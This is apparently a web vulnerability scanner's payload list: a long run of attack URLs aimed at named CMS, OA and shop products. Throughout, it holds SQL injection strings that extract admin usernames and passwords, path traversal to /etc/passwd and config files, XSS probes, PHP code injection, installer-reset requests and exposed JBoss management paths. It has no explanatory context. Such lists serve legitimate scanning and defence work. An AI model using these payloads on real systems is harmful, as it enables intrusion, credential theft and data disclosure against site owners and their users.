/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8 /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23 /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523 /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)# /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17 /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor /index.php?app=/../robots.txt%00 /index.php?app=user&ac=../../../robots.txt%00 /index.php?app=user&ac=plugin&in=../../robots.txt%00 /index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)-%3EgetAreaList();print(md5(1122));%23 /index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg /index.php?c=ajax&a=member_login&template=../../ooxx.php /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ /index.php?c=api&m=data&auth=finecms¶m=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f /index.php?c=buylist&a=dellist&id=1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E /index.php?c=tj&f=include&js=/../../config.php /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php /index.php?caid=1&ccid12=12&fsale=$%7B@print(md5(1122))%7D /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00 /index.php?case=archive&act=orders /index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26 /index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT@typeid,2,3,concat(0x7e,md5(1122),0x7e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_archive%20ORDER%20BY%201%23]=10 /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1 /index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23 /index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23 /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D /index.php?ctl=deals&k=pp%25%27%29and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23 /index.php?ctl=help&act=term%27%20and%20extractvalue%281%2Cconcat%280x5c%2Cmd5%280x7765627363616e%29%29%29%23 /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23 /index.php?id=-1%7C%7C1%20group%20by%20mid(md5(1122)%20from%20rand()*10%20for%2030)having%20min(1)%23&mod=compare /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1 /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css /index.php?keywords=zzz333&mod=search /index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc /index.php?m=Ajax&a=gettypeattr&type_id=1%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23 /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523 /index.php?m=Goods&a=showByUname&uname=%2527AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23 /index.php?m=Goods&a=showcate&id=1'cfreer /index.php?m=Order&a=index /index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23 /index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23 /index.php?m=company&s=space_comments&uid=1%20and%20extractvalue(1,%20concat(0x5c,%20(select%20md5(1122)%20from%20information_schema.tables%20limit%201)));%20-- /index.php?m=company&s=space_comments&uid=1and%20(SELECT%201%20from%20(selectcount(*),concat(floor(rand(0)*2),(substring((select(selEctconcat(user,0x7c,password)%20from%20b2bbuilder_admin%20limit%200,1)),1,62)))a%20frominformation_schema.tables%20group%20by%20a)b) /index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23 /index.php?m=member&c=index&a=public_checkname_ajax&username=admin%25%252727%20and%201=1%23 /index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23 /index.php?m=message&s=inquiry_basket /index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec) /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 /index.php?m=poster&c=index&a=poster_click&id=1 /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23 /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23 /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs= /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1 /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4 /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4 /index.php?mod=../admin/admin&a=list /index.php?mod=../admin/admin&ac=list /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00 /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00 /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product /index.php?s=/down/down/&file=./index.php /index/searchInfoTcontentByCategory.action?infoSearchPid=8&infoSearchkey=1%25'%20AND%201=CHAR(106)%2bCHAR(106)%2bCHAR(106)%20AND%20'%25'=' /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122 /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0 /index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20-- /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20-- /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20-- /info.php /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20-- /infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters= /info_send_sign/sign.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7161756c71,0x4876764d4b4b43744171,0x7166666571),NULL,NULL%23 /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1 /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))--- /information/OA_PingLun.asp?PLType=1&POAID=54'%20and+1=char(106)%20-- /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- /install.log /install.php /install/ /install/index.php /install/index.php.bak?insLockfile=1 /install/index.php?_m=frontpage&_a=check /install/index.php?insLockfile=1 /install/index.php?step=1&insLockfile=1 /install/install.php.lock?step=2 /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1 /install/step4.aspx /install/svinfo.php /installation/install.php /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271 /intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /invest/full_success/a20141200142%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)%20--%20-.html /invoker/EJBInvokerServlet/ /invoker/JMXInvokerServlet/ /ippool.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?name=-1%27%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7%23 /ippool_edit.php/login.php/login.php/login.php/login.php/login.php?ID=-1%27%20UNION%20SELECT%201,2,3,md5(0x045154),5,6,7%23 /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E// /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes /item/?c-5,key-1'.html /jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20-- /jcms/interface/ldap/ldapconf.xml /jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E /jcms/jcms_files/jcms1/web1/site/module/messagebook/opr_readfile.jsp?filename=opr_readfile.jsp /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4 /jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20-- /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20-- /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20-- /jcms/oawindow/helpshow.jsp?message=%3Cscript%3Ealert(String.fromCharCode(52,%2050,%2056,%2055,%2051));%3C/script%3E /jcms/setup/publishadmin.jsp /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20-- /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig /jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20 /jdwz/newsAction.do?flag=flag&NewsId=-12'%20union%20all%20select%20CHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29,12,12,12,12,12,12,12,12-- /jdwz/qtpage/findAllPoint.jsp?dtcxlb=vcsfjg&point_name=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2CNULL--%20&vcsfjg=all /jiaowu/jwgl/jxjh/jxjha.asp /jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp. /jis/front/sdgs/updateuser.jsp /jis/interface/offer.jsp?flag=user /jis/manage/databak/showlog.jsp?path=../showlog.jsp /jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20 /jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd /jmx-console/ /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201 /job/msearch-trunk/lastSuccessfulBuild/artifact/?pattern=C:/Windows/system.ini /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag= /jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20-- /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23 /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23 /js/calendar.php?lang=../js /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2 /jsearch/admin/opr_forcechangepwd.jsp /jsearch/main/index/down.jsp?pathfile=./&filename=WEB-INF/ini/merpserver.ini /jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E /jsp-examples/ /jsp/user/loginAction.do /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml /jwgl/jxjh/jxjha.asp /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns-- /kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL# /kdgs/biz/portal/govservice/deptServiceList.action?catalogName='%2b+convert(int,(char(106)%2bchar(58)))+%2b'&dc=12&__type=undefined /kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20 /kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# /kq/options/kq_duration_tree.jsp?params=union%09select%09table_name%09from%09information_schema.tables /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23 /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL-- /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20-- /level/15/exec/-/show/running-config/CR /level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29-- /link.php?act=go&url=webscan.cn' /linklist.asp?TlinkID=26'/**/and/**/1=char(106)-- /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23 /listdevchannal.php?iChan=1&devid=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8 /livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20-- /lkoa6/dzyj/LoadNextNode.ashx?id=1%27%20and%20@@version%3E0--&value=1&selectedUserIds=1&nodeModel=SYS 